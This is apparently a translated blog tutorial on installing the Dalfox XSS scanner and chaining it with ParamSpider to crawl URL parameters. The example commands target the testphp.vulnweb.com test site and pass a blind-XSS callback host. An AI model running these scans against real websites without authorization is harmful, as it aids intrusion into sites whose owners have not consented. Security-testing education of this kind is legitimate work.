Hello friends, in today’s article, I will show you how to use Dalfox tool to scan XSS vulnerabilities, this is a pretty cool and interesting tool, very useful for Pentester enthusiasts as well as Pentester enthusiasts. other Pentesters also like to use Dalfox. Before entering the article, I will briefly introduce the Dalfox tool and the concept of XSS vulnerability. Let’s get to the main point!
Note: This article is for educational and research purposes only. Please do not make illegal attacks. Anonyviet will not be responsible for any and all illegal acts caused by you!
Brief concept of XSS
Cross-Site Scripting (XSS) is a type of security attack where an attacker can insert malicious code into someone’s website and when the user visits that website, the malicious code will be executed on the other person’s machine. use that. XSS can lead to loss of credit, disclosure of private information, or attack on user machines.
Here’s how it works: The XSS vulnerability works by injecting malicious code into a web page or a web page input form. When a user visits a website or enters data into that form, malicious code will be executed on the user’s browser. Malicious code can get information from the user’s browser, send it to another server, or perform other tasks such as attacking the user’s machine or losing credit.
Dalfox – Pentest Web Application Tool
DalFox is a powerful open source XSS scanner, parametric analyzer and utility that accelerates the detection and verification of XSS errors. It comes with a powerful, feature-rich testing tool suitable for Pentester houses. The author of this tool is HAHWUL, is an engineer and a security researcher. In addition, Dalfox is also one of the most useful web application pentest tools available today and should be used by every pentester to find and fix security holes in the website.
How to install Dalfox tool
To use Dalfox, of course you need to install it :>, and installing Dalfox is also quite simple, you just need to do the following:
For Kali Linux: you just need to copy the Python code below, then save it with any name and the extension .py, here I save it as name.py, after pasting the code and saving the code, now you just need run the following command sudo apt install golang -y then run the Python script using the command python tênfile.py
And so, Dalfox will automatically install on your Kali Linux machine
#!/usr/bin/env python3
import os
import sys
def install_golang_module(module):
modulename = module.split("/")[-1].lower()
if not os.path.exists("/opt/" + modulename):
print("Installing go module " + modulename)
cmdseries = ["sudo -E GO111MODULE=on go get -v " + module,
"sudo ln -s /opt/" + modulename + "/bin/" + \
modulename + " /usr/local/bin/" + modulename]
os.environ["GOPATH"] = "/opt/" + modulename
for cmdstring in cmdseries:
os.system(cmdstring)
if __name__ == '__main__':
golang_modules_to_install = ['github.com/hahwul/dalfox']
for module in golang_modules_to_install:
install_golang_module(module)
For Windows: You just need to enter This linkdownload and extract it then just open the terminal and run it
How to use Dalfox?
To scan for XSS vulnerabilities on any website, we have the following command syntax:
dalfox url websitecoxss -b hawhul.xss.ht
For example:
dalfox url http://testphp.vulnweb.com:80/hpp/index.php?pp=FUZZ -b hawhul.xss.ht
And this is the result:
In addition, Dalfox has a lot of different and interesting commands, you can find out for yourself at the page GitHub by Dalfox
How to use Dalfox + ParamSpider for automatic vulnerability scanning
For those of you who do not know about the ParamSpider tool, the tool Paramspider developed by Devansh Batham, this tool has the function of “parametric mining from the dark corners of the web”. Roughly speaking, it’s like Crawling potentially hacked urls.
How to install Paramspider:
git clone https://github.com/devanshbatham/ParamSpider.git
cd ParamSpider
pip install -r requirements.txt or pip3 install -r requirements.txt
python paramspider.py -d têndomain or python3 paramspider.py -d têndomain
How to take Paramspider + Dalfox:
Command syntax python paramspider.py -d têndomain -o TênFileoutput.txt
For example:
python paramspider.py -d testphp.vulnweb.com -o vuln.xss
Output has the following form:
Thus, we have the web urls, now switch to Dalfox to scan each url
The command syntax is as follows: dalfox file đườngdẫnchứa\TênFileoutput.txt -b hawhul.xss.ht
For example: dalfox file vuln.xss -b hawhul.xss.ht
Here are the results that many of you expect:>
So there are quite a lot of Payload Xss shown !!!
This article is the end, I hope you learn something from this article, if you encounter any website with XSS vulnerabilities, please report it to the web admin right away, maybe you can get money back, right? :))
Wishing you all a very nice day!
You can also read more articles 10 websites to help you practice XSS hacking skills
